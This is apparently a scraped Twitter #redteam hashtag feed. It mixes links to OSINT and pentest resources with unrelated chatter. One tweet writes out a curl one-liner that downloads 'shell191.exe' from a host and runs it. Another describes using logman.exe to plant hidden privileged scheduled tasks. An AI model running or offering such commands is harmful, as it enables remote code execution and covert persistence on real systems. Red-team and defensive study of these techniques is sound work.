-
#OSINT: theHarvester:https://github.com/laramies/theHarvester … Recon-ng:https://bitbucket.org/LaNMaSteR53/recon-ng … FOCA:https://github.com/ElevenPaths/FOCA … Discover:https://github.com/leebaird/discover … Spiderfoot:http://www.spiderfoot.net/ Sn1per:https://github.com/1N3/Sn1per SimplyEmail:https://github.com/SimplySecurity/SimplyEmail …#bugbountytips#redteam#BugBounty -
So Madre is retired, a Vet and has cancer, Right? And a Land Line. Oh the Scams just line up at the fucking door. Mistake... calling mom's house and giving me a telephone number. I'm a Telco Engineer shitheads. Just Went
#RedTeam Bored anyway.Prikaži ovu nit -
I know, analogies are not perfect. I'm ready to get roasted, but this is an approach to explain the differences between Vul. Assessment,
#Pentest and#RedTeam. pic.twitter.com/xrqAgaJl9w
-
I got $10bucks on the
#redteam#SuperBowl2020


-
Places of Interest in Stealing NetNTLM Hashes
#infosec#pentest#redteam https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ … -
Be careful what you copy: Invisibly inserting usernames into text with Zero-Width Characters
#infosec#pentest#redteam https://medium.com/@umpox/be-careful-what-you-copy-invisibly-inserting-usernames-into-text-with-zero-width-characters-18b4e6f17b66 … -
-
Blessed to say that I am 100% committed to compete in the 10th Annual FCA All-Star Game!!
#RedTeam pic.twitter.com/2Z9i1fIVYXOvo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
-
This came in today! So since I’m stuck in the house it’s good timing.
#infosec#RedTeam pic.twitter.com/z1dg3Qxkvr
-
A View of Persistence - great post by
@_RastaMouse#infosec#pentest#redteam https://rastamouse.me/2018/03/a-view-of-persistence/ … -
SNMP Config File Injection to Shell
#infosec#pentest#redteam https://digi.ninja/blog/snmp_to_shell.php … -
EXTRACTING SERVICE ACCOUNT PASSWORDS WITH KERBEROASTING
#infosec#pentest#redteam https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/ … -
I have a few books to give away. If you are new to the infosec community, find me at
#shmoocon , I'll give you a copy.#redteam pic.twitter.com/ZJXVZpBtd1
-
#Curl.exe is the new#rundll32.exe -#LOLbin Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 … https://youtu.be/f2xpCl2Y7t8#blueteam#redteam#dfir#ThreatHunting -
Windows passwords decryption from dump files
#infosec#pentest#redteam https://github.com/AlessandroZ/LaZagneForensic …pic.twitter.com/50cBDaEUNA -
#OSINT : Built With:https://builtwith.com Google Dorks:https://www.exploit-db.com/google-hacking-database/ … Metagoofil:https://code.google.com/archive/p/metagoofil … Censys:https://censys.io/ URLScan:https://urlscan.io/ DNSStuff:https://www.dnsstuff.com/tools Netcraft:https://searchdns.netcraft.com#bugbountytips#redteam#BugBounty -
#redteam tip: use logman.exe with -b, -rf, -s, and -rc to create highly-privileged local, and remote scheduled tasks. They are deeply hidden in the Task Scheduler GUI, especially as the actions are masked under "Custom Handler". And no one looks for attackers in Perfmon/DCS. -
.
@SpecterOps recently decommissioned their Adversary Tactics:#PowerShell course, and rather than let it collect dust, they offered it up to the community for free in the spirit of their commitment to transparency. https://github.com/specterops/at-ps …#ThankYou#DFIR#BlueTeam#RedTeam -
#Redteam operators: Which defensive settings have you encountered that made it *super* painful for you to operate in a Windows AD environment?
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.